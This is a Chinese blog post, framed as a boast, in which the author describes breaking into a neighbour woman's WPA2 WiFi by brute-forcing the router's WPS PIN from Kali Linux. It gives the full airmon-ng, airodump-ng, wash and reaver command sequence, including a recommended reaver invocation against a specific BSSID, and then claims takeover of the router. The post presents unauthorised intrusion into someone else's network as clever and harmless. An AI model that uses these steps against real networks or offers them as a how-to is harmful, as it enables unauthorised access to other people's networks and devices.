【渗透】我入侵了隔壁妹子的Wifi,发现。。。

简介: 今天高高兴兴的回到家,打开电脑,我靠,没网!咋回事?连手机热点也贼慢。要不蹭网?下载万能钥匙?果断不能用万能钥匙!因为使用了万能钥匙,自家的Wifi密码也会共享出去。那么,怎么办?这难不倒我,于是,我打开了我的Kali操作系统,瞄准了隔壁妹子的Wifi。

WPA2-PSK加密原理

现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了,不能再像 WEP  加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供  WPS 功能,通过这个功能,用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8  位,而且可能的取值只有11000种(注意,不是 10^8 种)。所以我们可以进行简单粗暴的穷举 PIN  码破解,而且我们可以推断出这种破解方法在目标 AP 开启了 WPS  功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了,但至今依然奏效。

操作步骤

1.切换无线网卡到监听模式

airmon-ng  start  wlan0

2刺探附近 WLAN 网络(这个命令所跟的参数值可以在 步骤1 完成后从提示信息中查看到)

airodump-ng  wlan0mon


3.找出开启了 WPS 功能、可以使用 PIN码 登录的路由器,并另外记录下该 AP 的 BSSID(约等于该 AP 的 MAC 地址)

wash  -i  wlan0mon

微信图片_20211119153806.jpg

4.开始进行 PIN码 穷举破解(注意末尾的参数是 2 个小写字母 v)

reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

参数说明:-i 无线网卡名称 -b 目标AP的mac地址 -a 自动检测目标AP最佳配置 -S 使用最小的DH key,可以提高破解速度 -vv 显示更多的非严重警告(注意这是 2 个小写字母 v) -d 即delay每穷举一次的闲置时间 预设为1秒 -c 信道编号 -p PIN码四位或八位 //可以用8位直接找到密码。

破解时推荐使用这个命令:reaver -i wlan0mon -b D8:15:0D:D6:13:92 -a -S -d9 -t9 -vv,因为–d9 –t9参数可以防止pin死路由器。

微信图片_20211119153814.jpg

5.等待破解完成(这个破解可能会时间比较长,和你的目标 AP 有关,隔壁妹子没有网络安全意识,密码很脆弱,只用了几分钟便破解了),这期间我们可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度 信息

微信图片_20211119153821.jpg

6.破解成功

微信图片_20211119153824.jpg

7.成功联网

微信图片_20211119153850.jpg

8.拿下路由器

微信图片_20211119153902.jpg

微信图片_20211119153907.jpg

相关文章
|
安全 Linux 数据安全/隐私保护
|
安全 网络协议 数据安全/隐私保护
|
7月前
|
Android开发 Python
Python封装ADB获取Android设备wifi地址的方法
Python封装ADB获取Android设备wifi地址的方法
156 0
|
7月前
|
XML API Android开发
Android WIFI使用简述(上)
Android WIFI使用简述(上)
295 0
|
7月前
|
Android开发
Android 状态栏WiFi图标的显示逻辑
Android 状态栏WiFi图标的显示逻辑
180 0
|
7月前
|
Android开发
Android获取当前连接的wifi名称
Android获取当前连接的wifi名称
343 6
|
7月前
|
Android开发
android连接指定wifi
android连接指定wifi
112 0